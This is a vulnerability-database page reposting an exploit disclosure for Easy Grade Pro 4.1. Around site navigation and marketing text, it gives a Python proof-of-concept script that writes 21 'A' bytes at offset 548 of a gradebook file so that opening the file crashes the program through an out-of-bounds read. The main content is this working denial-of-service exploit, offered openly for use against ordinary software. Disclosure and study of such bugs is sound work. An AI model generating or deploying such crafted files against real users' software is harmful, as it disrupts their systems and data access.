Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Easy Grade Pro 4.1 Malformed .EGP File Denial of Service

🗓️ 11 Mar 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 88 Views

PoC for Easy Grade Pro 4.1: malformed EGP file crashes via out-of-bounds read at offset 548.

Code
=============================================================================================================================================
    | # Title     : Easy Grade Pro 4.1 Malformed .EGP File Triggering Crash                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://archive.org/embed/egp-collection                                                                                    |
    =============================================================================================================================================
    
    [+] Summary    : This Python script generates a malformed .EGP gradebook file designed to trigger a crash in Easy Grade Pro 4.1 by corrupting data at a specific offset within the file.
    
    The vulnerability occurs in the application's file‑parsing logic when processing proprietary .EGP files. The parser relies on offsets stored inside the file to reconstruct internal data structures. However, the application does not properly validate that these offsets remain within the bounds of the loaded file buffer.
    
    The script works by loading a legitimate .EGP file as a base template and injecting a controlled payload at a predefined offset (548 bytes). The payload consists of repeated 0x41 bytes ("A"), which corrupt internal offset calculations used during parsing. When the crafted file is opened by the application, this corruption can lead to an out‑of‑bounds read, resulting in an access violation and application crash.
    
    This Proof‑of‑Concept demonstrates a local denial‑of‑service condition caused by insufficient bounds validation during file parsing.
    
    The script performs several safety checks before creating the crafted file, including:
    
    Verifying the presence of a valid base .EGP file
    
    Ensuring the injection offset is within the file bounds
    
    Expanding the file size if the payload exceeds the original length
    
    After successful execution, the script generates a new file named:
    
    exploit_poc.egp
    
    Opening this file in Easy Grade Pro 4.1 may reproduce the crash associated with the vulnerability.
    			  
    [+] POC   : 
    
    
    import os
    import sys
    
    def generate_exploit():
    
        filename = "exploit_poc.egp"
        base_file = "base.egp"
    
        try:
    
            if not os.path.exists(base_file):
                print("[-] Base EGP file not found. Please place a valid 'base.egp' in the same directory.")
                return
    
            with open(base_file, "rb") as f:
                base_data = bytearray(f.read())
    
            injection_offset = 548
            payload_size = 21
            payload_char = b"\x41"  # "A"
    
            if injection_offset >= len(base_data):
                print("[-] Injection offset is outside file size.")
                return
    
            if injection_offset + payload_size > len(base_data):
                print("[!] Payload exceeds file size, resizing file...")
                base_data.extend(b"\x00" * ((injection_offset + payload_size) - len(base_data)))
            payload = payload_char * payload_size
            base_data[injection_offset:injection_offset + payload_size] = payload
            with open(filename, "wb") as f:
                f.write(base_data)
    
            print("[+] Exploit file created successfully")
            print(f"[+] Output File : {filename}")
            print(f"[+] Injection Offset : {injection_offset}")
            print(f"[+] Payload Size : {payload_size} bytes")
            print("[!] Open the file using Easy Grade Pro 4.1 to test the crash.")
    
        except Exception as e:
            print(f"[-] Error creating exploit file: {e}")
    
    
    if __name__ == "__main__":
        generate_exploit()
    
    summary en titel
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
easy grade proegp fileoffset 548out of boundsapplication crashlocal denialdenial of servicepayload injectionmalformed file
88